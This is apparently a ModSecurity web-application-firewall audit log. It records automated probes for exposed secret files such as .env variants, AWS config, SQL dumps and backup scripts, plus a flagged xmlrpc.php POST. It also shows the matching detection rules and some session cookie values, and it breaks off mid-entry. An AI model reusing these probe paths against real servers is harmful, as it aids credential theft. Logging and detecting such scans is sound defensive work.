[level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api/.env"] [unique_id "aFCr4ZWbMc1Q3J_M-mhIhAAAAAo"] Stopwatch: 1750117345873894 3800 (- - -) Stopwatch2: 1750117345873894 3800; combined=2233, p1=553, p2=1563, p3=23, p4=29, p5=65, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f9d8de7f-Z-- --6fa2aa68-A-- [17/Jun/2025:05:12:27.862212 +0530] aFCr4wrsPejRtmHkrKLgZAAAAAE 185.177.72.204 51090 127.0.0.1 7080 --6fa2aa68-B-- GET /api/config/config.yml HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6fa2aa68-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fa2aa68-H-- Message: Warning. Matched phrase "/config/config.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api/config/config.yml"] [unique_id "aFCr4wrsPejRtmHkrKLgZAAAAAE"] Stopwatch: 1750117347859370 2884 (- - -) Stopwatch2: 1750117347859370 2884; combined=1705, p1=424, p2=1193, p3=18, p4=23, p5=47, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6fa2aa68-Z-- --8c6e4b40-A-- [17/Jun/2025:05:12:27.972564 +0530] aFCr49yZ4SMykfn97vy3WAAAAAs 185.177.72.204 51096 127.0.0.1 7080 --8c6e4b40-B-- GET /api/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8c6e4b40-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c6e4b40-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/api/db.sql"] [unique_id "aFCr49yZ4SMykfn97vy3WAAAAAs"] Stopwatch: 1750117347969416 3191 (- - -) Stopwatch2: 1750117347969416 3191; combined=1963, p1=315, p2=1548, p3=21, p4=26, p5=53, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c6e4b40-Z-- --e0423160-A-- [17/Jun/2025:05:12:28.083002 +0530] aFCr5AJ4p5Cdblnjra53xwAAAAI 185.177.72.204 51106 127.0.0.1 7080 --e0423160-B-- GET /api/db_backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e0423160-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0423160-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/api/db_backup.sql"] [unique_id "aFCr5AJ4p5Cdblnjra53xwAAAAI"] Stopwatch: 1750117348079713 3336 (- - -) Stopwatch2: 1750117348079713 3336; combined=2068, p1=359, p2=1608, p3=20, p4=26, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0423160-Z-- --50e88639-A-- [17/Jun/2025:05:12:30.071664 +0530] aFCr5lJfblPUQiSn5r2RfgAAAAA 185.177.72.204 50820 127.0.0.1 7080 --50e88639-B-- GET /api/shared/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --50e88639-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --50e88639-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api/shared/.env"] [unique_id "aFCr5lJfblPUQiSn5r2RfgAAAAA"] Stopwatch: 1750117350068422 3286 (- - -) Stopwatch2: 1750117350068422 3286; combined=1862, p1=386, p2=1372, p3=21, p4=25, p5=57, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50e88639-Z-- --e502fb71-A-- [17/Jun/2025:05:12:30.291991 +0530] aFCr5uTJOk1gXj_qIh4XywAAAAQ 185.177.72.204 50840 127.0.0.1 7080 --e502fb71-B-- GET /api/shared/config/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e502fb71-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e502fb71-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api/shared/config/.env"] [unique_id "aFCr5uTJOk1gXj_qIh4XywAAAAQ"] Stopwatch: 1750117350288900 3135 (- - -) Stopwatch2: 1750117350288900 3135; combined=1909, p1=387, p2=1418, p3=20, p4=27, p5=57, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e502fb71-Z-- --8ce62030-A-- [17/Jun/2025:05:12:32.832026 +0530] aFCr6FCTF37l_jAzt4oS2AAAAAU 185.177.72.204 51024 127.0.0.1 7080 --8ce62030-B-- GET /app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8ce62030-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ce62030-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/app.js.bak"] [unique_id "aFCr6FCTF37l_jAzt4oS2AAAAAU"] Stopwatch: 1750117352829179 2889 (- - -) Stopwatch2: 1750117352829179 2889; combined=1708, p1=340, p2=1276, p3=17, p4=23, p5=52, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8ce62030-Z-- --d75f2109-A-- [17/Jun/2025:05:12:33.162612 +0530] aFCr6YoVQnPDyHnl9oPThwAAAAY 185.177.72.204 51058 127.0.0.1 7080 --d75f2109-B-- GET /app/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d75f2109-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --d75f2109-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/app/.env"] [unique_id "aFCr6YoVQnPDyHnl9oPThwAAAAY"] Stopwatch: 1750117353160235 2419 (- - -) Stopwatch2: 1750117353160235 2419; combined=1513, p1=365, p2=1061, p3=18, p4=23, p5=46, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d75f2109-Z-- --762bf418-A-- [17/Jun/2025:05:12:33.272953 +0530] aFCr6ZWbMc1Q3J_M-mhIjQAAAAo 185.177.72.204 51066 127.0.0.1 7080 --762bf418-B-- GET /app/config/parameters.yml HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --762bf418-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --762bf418-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/app/config/parameters.yml"] [unique_id "aFCr6ZWbMc1Q3J_M-mhIjQAAAAo"] Stopwatch: 1750117353269811 3186 (- - -) Stopwatch2: 1750117353269811 3186; combined=1972, p1=379, p2=1492, p3=20, p4=26, p5=55, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --762bf418-Z-- --ec963d51-A-- [17/Jun/2025:05:12:33.604214 +0530] aFCr6QrsPejRtmHkrKLgbQAAAAE 185.177.72.204 51094 127.0.0.1 7080 --ec963d51-B-- GET /application/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ec963d51-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec963d51-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/application/.env"] [unique_id "aFCr6QrsPejRtmHkrKLgbQAAAAE"] Stopwatch: 1750117353601342 2916 (- - -) Stopwatch2: 1750117353601342 2916; combined=1705, p1=402, p2=1210, p3=18, p4=24, p5=51, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec963d51-Z-- --9f7d0411-A-- [17/Jun/2025:05:12:33.714665 +0530] aFCr6YoVQnPDyHnl9oPTiAAAAAY 185.177.72.204 51098 127.0.0.1 7080 --9f7d0411-B-- GET /apps/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9f7d0411-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f7d0411-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/apps/.env"] [unique_id "aFCr6YoVQnPDyHnl9oPTiAAAAAY"] Stopwatch: 1750117353711528 3183 (- - -) Stopwatch2: 1750117353711528 3183; combined=1939, p1=381, p2=1458, p3=21, p4=27, p5=52, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f7d0411-Z-- --5e5a1d3f-A-- [17/Jun/2025:05:12:35.039876 +0530] aFCr61JfblPUQiSn5r2RhAAAAAA 185.177.72.204 51194 127.0.0.1 7080 --5e5a1d3f-B-- GET /aws/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5e5a1d3f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e5a1d3f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/aws/.env"] [unique_id "aFCr61JfblPUQiSn5r2RhAAAAAA"] Stopwatch: 1750117355037059 2859 (- - -) Stopwatch2: 1750117355037059 2859; combined=1586, p1=343, p2=1152, p3=16, p4=20, p5=55, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e5a1d3f-Z-- --c20fed66-A-- [17/Jun/2025:05:12:35.150518 +0530] aFCr65VkCcfT-Z8NQYzE2QAAAAc 185.177.72.204 51198 127.0.0.1 7080 --c20fed66-B-- GET /aws/.env.prod HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c20fed66-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c20fed66-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/aws/.env.prod"] [unique_id "aFCr65VkCcfT-Z8NQYzE2QAAAAc"] Stopwatch: 1750117355147077 3486 (- - -) Stopwatch2: 1750117355147077 3486; combined=2066, p1=411, p2=1554, p3=21, p4=28, p5=52, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c20fed66-Z-- --a1e70c25-A-- [17/Jun/2025:05:12:35.261009 +0530] aFCr6wGFf516NUzzD0B3PgAAAAg 185.177.72.204 51208 127.0.0.1 7080 --a1e70c25-B-- GET /aws/.env.ses HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a1e70c25-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1e70c25-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/aws/.env.ses"] [unique_id "aFCr6wGFf516NUzzD0B3PgAAAAg"] Stopwatch: 1750117355257727 3326 (- - -) Stopwatch2: 1750117355257727 3326; combined=2006, p1=438, p2=1473, p3=19, p4=25, p5=51, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a1e70c25-Z-- --82b12514-A-- [17/Jun/2025:05:12:36.696049 +0530] aFCr7AGFf516NUzzD0B3QAAAAAg 185.177.72.204 51344 127.0.0.1 7080 --82b12514-B-- GET /aws/config.ini HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --82b12514-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --82b12514-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/aws/config.ini"] [unique_id "aFCr7AGFf516NUzzD0B3QAAAAAg"] Stopwatch: 1750117356693363 2737 (- - -) Stopwatch2: 1750117356693363 2737; combined=1596, p1=318, p2=1193, p3=17, p4=22, p5=46, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82b12514-Z-- --a675ac32-A-- [17/Jun/2025:05:12:38.453413 +0530] aFCr7VCTF37l_jAzt4oS3wAAAAU 146.190.105.35 52122 127.0.0.1 7081 --a675ac32-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=657qgas1kqq99im29oghbrgkt4; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5d22a5505651a38c622d0c3d17514e%7C%7C1750290156%7C%7C1750286556%7C%7Ce2367dbb4b81e27822e4d1e419799eee; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c1cc74c3a1d35c353da3fd8d0b46864e%7C%7C1750290157%7C%7C1750286557%7C%7C9192f16657269d0249cac0a310de2cde User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a675ac32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=hblicr7i5lan8ej2snag8ohicc; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_8f3e87880644106266181fae79684b%7C%7C1750290158%7C%7C1750286558%7C%7C0c16f3d26785dad366ebd04802c513e9; expires=Wed, 18 Jun 2025 23:42:38 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=dc3837e8812e0e01a70e49c6e34fe129%7C%7C1750290158%7C%7C1750286558%7C%7Cff6ecf07d78e75ecc66832b5c746fce4; expires=Wed, 18 Jun 2025 23:42:38 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a675ac32-E-- --a675ac32-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCr7VCTF37l_jAzt4oS3wAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117357373243 1080269 (- - -) Stopwatch2: 1750117357373243 1080269; combined=105165, p1=356, p2=1963, p3=113, p4=41, p5=51382, sr=81, sw=51310, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a675ac32-Z-- --b2e03220-A-- [17/Jun/2025:05:12:39.813317 +0530] aFCr71CTF37l_jAzt4oS4QAAAAU 185.177.72.204 32770 127.0.0.1 7080 --b2e03220-B-- GET /aws/s3/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b2e03220-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2e03220-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/aws/s3/.env"] [unique_id "aFCr71CTF37l_jAzt4oS4QAAAAU"] Stopwatch: 1750117359810135 3224 (- - -) Stopwatch2: 1750117359810135 3224; combined=1989, p1=411, p2=1482, p3=21, p4=26, p5=49, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2e03220-Z-- --db3dcf41-A-- [17/Jun/2025:05:12:40.034663 +0530] aFCr8ArsPejRtmHkrKLgcwAAAAE 185.177.72.204 32782 127.0.0.1 7080 